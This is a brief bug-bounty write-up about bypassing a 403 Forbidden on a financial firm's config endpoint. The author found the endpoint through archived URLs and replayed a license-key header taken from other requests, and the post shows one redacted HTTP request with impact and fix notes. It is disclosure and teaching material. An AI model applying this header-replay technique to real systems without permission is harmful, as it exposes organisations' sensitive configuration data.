403 forbidden bypass & Accessing config files using a header

This is my first writeup on how i bypass 403 & accessed the config file

Hi Everyone,

My name is vishnurajr, This is my first writeup, How i found a bypass for 403 FORBIDDEN !

So let’s begin,

403 forbidden :- The HTTP 403 Forbidden response status code indicates that the server understands the request but refuses to authorize it

The target was a financial-based sector, During the recon, I found a subdomain with a login page, That login page was used by branch executives of the financial-based sector. It uses 3 credentials to login to its panel & uses some random credentials nothing happens there . Then I tried google dorks to find some endpoints but nothing works , Atlast I searched the domain in archive directory and got some endpoint it is not important.But one endpoint caught my attention the endpoint was like this

/v1/redacted/redacted/redacted/cms/config?channel=desktop

And access the endpoint ,and I got a forbidden on the endpoint

Then the next step is to bypass the forbidden. I tried every possible 403 bypasses that was previously finded by security researchers, but nothing happens there 😐 😐😐😐😐😐😐😐 still forbidden, forbidden, forbidden!!!!!

After sometimes I went to the burp history for searching a luck, I noticed that in some requests like login …etc. it contains an X-License-Key Header . I think let's copy the header into it, I copied the X-License-Key header and pasted it on the config endpoint request

GET /v1/redacted/redacted/redacted/cms/config?channel=desktop
Host:*.redacted.*
X-License-Key: xxxxxxxxxxxxxxxxxxx

Got access to the config endpoint and I bypassed the 403 forbidden

The config files contains lot of information like this

Impact

• An attacker can able to gain sensitive Information about the target

Fix:- They removed the x-license-key header from every request